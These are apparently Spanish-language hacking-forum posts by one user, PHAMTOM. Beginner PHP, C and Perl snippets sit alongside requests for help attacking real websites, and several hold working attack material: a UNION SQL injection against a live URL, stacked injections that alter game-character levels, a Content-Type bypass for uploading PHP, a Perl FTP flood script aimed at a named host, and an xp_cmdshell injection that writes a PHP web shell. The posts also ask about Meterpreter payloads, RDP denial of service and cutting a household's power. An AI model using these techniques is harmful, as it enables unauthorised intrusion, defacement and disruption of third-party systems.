Temas

Muchas netbooks fuerón entregadas a diferentes escuelas en la argentina , estas netbooks tienen un supuesto sistema de seguridad donde son controladas y bloqueadas por el consejo de educación,dentro de ese sistema tambien un filtro de navegación para evitar la navegación en redes sociales , y sitios no deseados.
Navegando por internet encontre solamente esta información.

El acceso a Internet tendrá filtros de navegabilidad para evitar el ingreso a sitios inconvenientes. Además, cada netbook cuenta con un sistema de validación de seguridad que bloquea la netbook si la misma no se conecta con el servidor instalado en cada escuela durante un tiempo preestablecido.

Escuchando en mi escuela, dijierón algo sobre la limitación de uso en la casa , que se te termina el arranque o algo así dijo una profesora de computación, que pasado los 30 días de uso , tenes que pasar por el servidor de la escuela para poder avilitar nuevamente la netbook ,
Alguien tiene información tecnica sobre esto?

Saludos.

Formularios :

Código [Seleccionar] Expandir

<html>
<title>Sistema de user administrador</title>
<center><h1>Sistema de usuario</h1></center>
<br>
<br>
<form action="verificar.php" method="POST">
<input type="text" name="usuario">
<br><input type="password" name="password">
<br><input type="submit" name="boton" value="Comprobar">
</form>
</html>



Php con explicacion :

Código [Seleccionar] Expandir


<html>
<title>Comprobando..</title>
<h1><center>Comprobaciones con PHP</h1></center>
<?php // Comienzo de php
function campos()
{
echo "Rellena los campos correctamente";
}
function  incorrecto()
{
echo "Error, user o password incorrecto";
}
$user="prueba"; // Variable que guarda la cadena prueba como un usuario.
$contra="prueba1"; // Variable que guarda la cadena prueba1 como la contraseña.
$us=$_REQUEST['usuario']; // Variable us , guardando el usuario introducido por el formulario.
$ps=$_REQUEST['password']; // Variable ps , guardando la contraseña introducida en el formulario.
if(empty($us)) // Comprueba si esta vacio el formulario usuario , en caso que si llama la funcion campos de arriba.
{
campos();
}
else
{
if(empty($ps))  // Comprueba si esta vacio el formulario contraseña , en caso que si llama la funcion campos de arriba.
{
campos();
}
else
{
if($user == $us and $contra == $ps) // Si los formularios no estan basios, hace la comprobacion de cadenas
{
echo "<center>"."Bienvenido"." ".$user; // Si es correcto imprime bienvenido con el nombre de usuarios
}
else // si no
{
incorrecto(); // Llamada a la funcion incorrecto
}
}
}
//Cierre de php
?>



Este codigo es super sencillo , es un ejemplo para los que recien comienzan y quieran ver un poco sobre comprobaciones de cadenas con if , funciones , y variables.
Un saludo. ( ESTOY POR HACER EL MISMO PERO CON USUARIOS CON MYSQL , QUE APORTARE EN EL MISMO POST )

Buenas,estaba buscando un buen manual , que explique bien el manejo de sql server 2000 con una api en visualbasic 6.0 , necesito hacer un par de consultas y añadir cosas al registro desde un programa visualbasic , alguien me aconseja un manual?? , muchas gracias.

estuve viendo un tema en otro foro de hacking,que no nombro para evitar el spam , lo que se es que dijierón que WHK descubrio la vulnerabilidad.

Por lo qué entendi , cuando se carga la imagen que alojamos en nuestro servidor con codigo PHP, que es tomada como una aplicacion por el .htaccess ,se ejecuta el codigo php.

Osea,yo tengo un servidor Mio con un htaccess con el siguiente codigo

Código [Seleccionar] Expandir

<Files *.jpg>
ForceType application/x-httpd-php
</Files>

Ahora mi pregunta es la siguiente :

E entendido que si la pagina tiene para meter las etiquetas de imagen y cargar la imagen,puedo ejecutar el codigo php.

si yo subo la imagen al host, por medio de un upload o algo similar,el codigo se ejecuta ??


si alguien me puede profundisar un poquito el tema se lo agradeceria,gracias.

Una vez que tengo mi htaccess y mi imagen con el codigo .php , como vulnero un servidor VICTIMA, si logro clabar un <img src="mihost/imagen.jpg"> se ejecutaria? ?

PHAMTOM

Buenas,e escuchado o leido , que hay una vulnerabilidad que se explota, con el cambio de idiomas en los sitios webs que tienen para elegir difernetes idiomas.

A que se puede llegar ? , a que afecta ?.

Que vulnerabilidad es ?

Hay algo de documnetacion ??

muchas gracias de antemano.

Buenas tengo una pagina,que me tiro error al hacer una consulta.

http://xxxx.xx/index.php?not=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%E7&idc=38&p=1

el error es


No se pudo ejecutar la consulta

SELECT not_id,not_fecha,not_titulo,not_imagen,not_contenido,not_enlace FROM ptc_noticias WHERE not_id=-1 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--&ccedil; ORDER BY not_fecha

Error MySQL: : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ç ORDER BY not_fecha' at line 1

-----------------

Esta pagina es vulnerable a mysqlinject ? , una vez que termine de concactenar todas las columnas podre seguir como una inyeccion normal, ?? o asi no llegare a nada.salu2

Buenas, quería saber si hay algun metodo para cortar la corriente de una cuadra entera, o de una casa en especial , sin ingresar adentro y tocar los interructores .. saludos.

PHAMTOM

• Suma
  
• Resta
  
• Multriplicacion
  
• Divicion
  
• Potencia
  
• Pitagoras
  
  
  Código [Seleccionar] Expandir
  #include <stdio.h>
#include <stdlib.h>
#include <math.h>
//Declaraciones de funciones
int pot(int base,int exponente)
{
int ret=1;
while(exponente--)
ret*=base;
return ret;
}
int calcular2(int h,int c)
{
    int k,catetox;
    h=h*h;
    c=c*c;
    k=h-c;
    catetox=sqrt(k);
    return catetox;
}
int calcular(int y,int x)
{
    int r;
    y=y*y;
    x=x*x;
    r=x+y;
    float hipotenusa=0;
    hipotenusa=sqrt(r);
    return hipotenusa;
}
int sumar(int x,int y)
    {
        int resultado;
        resultado = x+y;
        return resultado;
        }
        int restar(int x,int y)
        {
            int resultado;
            resultado = x-y;
            return resultado;
            }
             int Multriplicar(int x,int y)
        {
            int resultado;
            resultado = x*y;
            return resultado;
            }
              int Dividir(int x,int y)
        {
            int resultado;
            resultado = x/y;
            return resultado;
            }
/*Calculadora escrita en ANSI C PHAMTOM*/
int main()
{
    system("cls");
    char a;
    printf("\t");
    system("color 0b");
   

    // Delacaraciones :
                      int opt=0,opt1=0,opt2=0,cateto=0,cateto2=0,hipotenusa=0,p1=0,p2=0;
                     
   
                      //Menu :
                             printf("[+]Menu basico\n");
                      printf("1-Sumar\n");
                      printf("2-Restar\n");
                      printf("3-Multriplicar\n");
                      printf("4-Dividir\n");
                      printf("\n");
                      printf("[+]Pitagoras\n");
                      printf("5-Sacar Hipotenusa x\n");
                      printf("6-Sacar Cateto x\n");
                      printf("\n[+]Potencia");
                      printf("\n7-Potencia");
printf("\n\nN de opcion-> ");
//Operaciones
scanf("%d",&opt);
//Suma
if(opt==1)
{
          system("cls");
          printf("\tSumar\n\n\n");
          printf("Operando 1-> ");
          scanf("%d",&opt1);
          printf("Operando 2-> ");
          scanf("%d",&opt2);
           system("color 05");
          printf("\nEl resultado es -> %d",sumar(opt1,opt2));
          system("pause>nul");
          main();
}
//Resta
if(opt==2){
           system("cls");
          printf("\tRestar\n\n\n");
          printf("Operando 1-> ");
          scanf("%d",&opt1);
          printf("Operando 2-> ");
          scanf("%d",&opt2);
           system("color 05");
          printf("\nEl resultado es ->  %d",restar(opt1,opt2));
                  system("pause>nul");
                  main();
          }
          //Multriplicacion
          if(opt==3){
           system("cls");
          printf("\tMultriplicar\n\n\n");
          printf("Operando 1-> ");
          scanf("%d",&opt1);
          printf("Operando 2-> ");
          scanf("%d",&opt2);
           system("color 05");
          printf("\nEl resultado es ->  %d",Multriplicar(opt1,opt2));
          system("pause>nul");
          main();
          }
          //Divicion
               if(opt==4){
           system("cls");
          printf("\tDividir\n\n\n");
          printf("Operando 1-> ");
          scanf("%d",&opt1);
          printf("Operando 2-> ");
          scanf("%d",&opt2);
          system("color 05");
          printf("\nEl resultado es ->  %d",Dividir(opt1,opt2));
          system("pause>nul");
          main();
          }
          if(opt==5)
          {
                   
                       
                        system("cls");
                        printf("Calcular Hipotenusa ' x ' ");
                        printf("\n\nCateto 1 mide -> ");
                        scanf("%f",&cateto);
                        printf("\nCateto 2 mide -> ");
                        scanf("%f",&cateto2);
                        printf("\n\nLa hipotenusa mide %f",calcular(cateto,cateto2));
                        system("pause>nul");
                        main();
                    }
                    if(opt==6)
                    {
                              system("cls");
                                      printf("Calcular un Cateto ' x '");
                        printf("\n\nHipotenusa mide -> ");
                        scanf("%f",&hipotenusa);
                        printf("\nCateto Mide -> ");
                        scanf("%f",&cateto);
                        printf("\n\nEl cateto X mide ->%f",calcular2(hipotenusa,cateto));
                        system("pause>nul");
                        main();
                              }
    if(opt==7)
    {
            system("cls");
                                      printf("Potencia");
                        printf("\n\nBase -> ");
                        scanf("%d",&p1);
                        printf("\nExponente ");
                        scanf("%d",&p2);
                        printf("\n\nPotencia ->%d",pot(p1,p2));
                        system("pause>nul");
                        main(); 
              }
             

          if(opt>=8 || opt<=0)
          {
                   system("cls");
                   system("msg * Use 1,2,3,4,5,6");
                   main();
                    }
                    }
  
  
  SALUDOS.

Código (c) [Seleccionar] Expandir

[ANSI C]Convertor de cadena a ASCII.

//Convertor por PHAMTOM
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define N_ELEMENTOS 256
void error(void)
{
    system("cls");
    printf("Use 1,2");
    system("pause>nul");
    exit(-1);
    }
int main()
{
   int p,x,o,q;
  char miarr[N_ELEMENTOS];
  printf("Convertor ASCII\n\n\n");
  printf("Cadena a convertir a ASCII  -> ");
  scanf("%s",miarr);

            p=strlen(miarr);
            if(p>=250)
            {
                      system("cls");
                      printf("Use 250 caracteres");
                      system("pause>nul");
                      }
                      else
                      {
   printf("\nCadena : %s\n\n",miarr);
   printf("Caracteres ASCII : ");
   for(x=0;x<p;x++)
   {
           printf("%d",miarr[x]);
           printf(",");
           }
           printf("\n\n1)Volver");
           printf("\n2)Salir\n\n->");
           scanf("%d",&o);
           if(o<=0 || o>=3)
           {
                  error();
                   }
                  if(o==1)
                  {
                          system("cls");
                          main();
                          }
                          if(o==2)
                          {
                                  system("cls");
                                  printf("Gracias por usar el convertor,precione una tecla para salir");
                                  system("pause>nul");
                                  exit(-1);
                                  }
           
           printf("\n\nTerminado.");
   system("pause>nul");
}
}


Para win , un saludo.

Buenas aca vengo con una duda,estaba testeando una pagina que se podia subir imagenes jpeg, subi una imagen jpeg y vi su direccion :

http://pagina.com.ar/imagens/char/2d1adda04d8fadc6debe1cd645003baa.jpg

el nombre de la imagen que subi era pwn2ed.jpg o algo así.

Cuando subo un php , utilizando live http headers , pasando el filtro de content-type a image/jpeg , sube el php y queda del siguiente modo :


http://pagina.com.ar/imagens/char/e0fb0383b1577be1c0eb67edc0c2ad01

el php se llama pwned.php

y tiene el codigo siguiente :

<?php
echo 'hola';
?>

cuando ingreso a

http://pagina.com.ar/imagens/char/e0fb0383b1577be1c0eb67edc0c2ad01

no me interpreta el php, ni tampoco html ni nada.

me queda visualisado en el navegador lo siguiente :

<?php
echo 'hola';
?>
sin leerme el php , alguien me puede ayudar me trabe jaja , un abrazo gracias de antemano.

PHAMTOM

Buenas,estaba revisando unas inyecciones sql para un juego ..

y e encontrado 2 tipos de inyecciones,en algunas webs funciona una y en otras funciona otra.

las 2 inyecciones son las siguientes :


' update character set clevel=400 where name = 'PHAMTOM'        //Esta inyeccion me edita el nivel.
'x'; update character set clevel=400 where name = 'PHAMTOM'     // esta inyeccion me edita el nivel.

yo sé que el " ; " sirve para terminar una sentencia , y poder empezar la otra pero no le veo explicación al  " 'x' "

saludos.PHAMTOM

Buenas,abro este post,porq sobre modulo LWP solo encontre en ingles documentación , preguntaba si alguien tiene a mano , algun tutorial sobre el modulo LWP en perl , en español que sea bueno , muchisimas gracias.

PHAMTOM

Buenas, me surgio una duda ,después de leer un manual de http y los metodos , quisiera saber , como hacer para saber , si el metodo PUT o Delete estan activos, estuve viendo algo de el metodo OPTIONS q justamente , sirve para eso , y desde la terminal.. para informarme de los metodos http , hago lo siguiente.. "ESTOY EN UBUNTU LINUX.

telnet WEB PUERTO
OPTIONS HTTP/1.1

Quisiera saber , si esta consulta http esta bien y supuestamente,si el metodo OPTIONS esta abilitado , me devolveria información.. saludos.

PHAMTOM

Buenas,preguntaba si hay alguna forma de generar un exe, y pasarlo a otra pc, y cuando ese .exe se ejecute, obtenga remote shell meterpreter ?? ..

saludos,PHAMTOM.

Buenas tardes, podria pedir un ejemplo de como verificar un archivo existente en una pagina web con perl y la biblioteca LWP , ejemplo

quiero verificar que un archivo.php , exista en una pagina web o no de esta forma

miweb.com/ejemplo.php

Quiero verificar con LWP si el archivo ejemplo.php existe y si existe , imprimir con un print "OK"; y de lo contrario Print "No";

Saludos,muchas gracias de antemano.

PHAMTOM

Buenas,estaba escribiendo un programa , para un ftp que es vulnerable a multriples conexiones fallidas, pero no me funciona muy bien , aca esta el codigo , aver si podeis encontrar el error

Código [Seleccionar] Expandir


#Logo
print q(
Flood ftp
);
use Net::FTP;
#Create user and pass
my $contador=0;
my $userpass="AAAAAA";
do
{
print("Intentos : $contador");
$userpass x 1;
$contador++;
my $ftp = Net::FTP->new("ftp.jamaikamu.com") or die("No se pudo conectar al servidor: $!");
$ftp->login($userpass,$userpass);
print("Login incorrecto");
#ACCIONES QUE QUEREMOS EJECUTAR EN EL SERVIDOR
$ftp->quit or die("No se puedo desconectar del servidor: $!");
print("Intentos : $contador");
} until($contador > 600000);

Supuestamente,esto tendria que conectarse al ftp ftp.jamaikamu.com , multriples veces , con un password fallido , que va a ser el $userpass .

No me anda ni el contador, asique no sé,estare haciendo todo mal,antes de seguir mentiendo mano.
es algo parecido a un D.o.S

Buenas a todos, les comento , bueno el tema es el siguiente, e buscado y buscando manuales de sockets bien explicados de perl , en internet y los que veo estan en ingles,y uno que vi bueno que estaba en idioma ingles,use el traductor de google, para traducirlo pero tenia un flash, que exigia un registro , cuando inciaba la pagina,entonces el traductor no pudo traducirme la pagina y ingles no sé.
Luego vi uno de vengador de las sombras,pero el tema socket, lo pasa muy por arriba,habla un poco sobre ellos,pero no pude comprender en su totalidad los sockets.-

Quisiara saber si alguien tiene una pagina en español,sobre sockets bien explicados , o un pdf o algo así , muchisimas gracias de antemano ,les dejo un abrazo.-

PHAMTOM : )

Buenas,me estoy iniciando en el mundo de la programación en perl , y me surgio un problema al hacer una especie de "CRACKME".

El tema es que cuando , el password se comprueba,da siempre resultado correcto..

El codigo del mismo es :

Código [Seleccionar] Expandir

#!/usr/bin/perl
print("Escribe el password : ");
$pass=<STDIN>;
system("cls");
if($pass=="hola")
{
print("Password correcto\n\n");
}
else
{
print("Password incorrecto\n\n");
}

Aunque en <STDIN> entre askdjasdjkhasd, el password me da correcto :'(..

Tambien probe con :

Código [Seleccionar] Expandir

#!/usr/bin/perl
print("Escribe el password : ");
$pass=<STDIN>;
$contador=1;
# no le presteis atencion al contador feo.
do
{
$contador++;
print("\nCargando..");
system("cls");
}until($contador == 20);
system("cls");
if($pass!="hola")
{
print("Password incorrecto\n\n");
}
else
{
print("Password correcto\n\n");
}




Gracias de antemano, saludos : ) ..

MOTMAHP

Buenas,quiero saber si existe algun escaner, o alguna forma de sacar los directorios de una pagina web, muchas gracias.-

PHAMTOM

Buenas,en mi objetivo,e encontrado aparte del servidor http, que tiene el servicio de escritorio remoto de windows,por lo que e leido,se puede atacar D.O.S por ese servicio , e buscado exploits y no e encontrado,ahora la pregunta es si hay algun exploit para este servicio o alguna forma de ataque ,saludos y gracias de antemano..



3389/tcp open  microsoft-rdp Microsoft Terminal Service

PHAMTOM

Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-

quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..

La inyeccion la hago por un formulario..-


Saludos,PHAMTOM

hola

yo queria atravez de sql server , de una iyneccion en las bases de datos de una web
que corre por sql server
queria subirle un archivo ,pero , me pueden corregir el codigo,no lo sube y lo vi varias veces.


'';exec master..xp_cmdshell 'echo ^<? $d=fopen("index.php","w");$s=$_REQUEST["variable"];fputs($d,$s);fclose($d); ?^>  > C:\AppServ\www\update.php'--

Queria subir el archivo update,con el siguiente codigo .

Gracias de antemano

el individuo usa appserver

hola

como fixeo un upload de imagenes vulnerable a que pueda subir un archivo .php , desde las cabezeras http?

saludos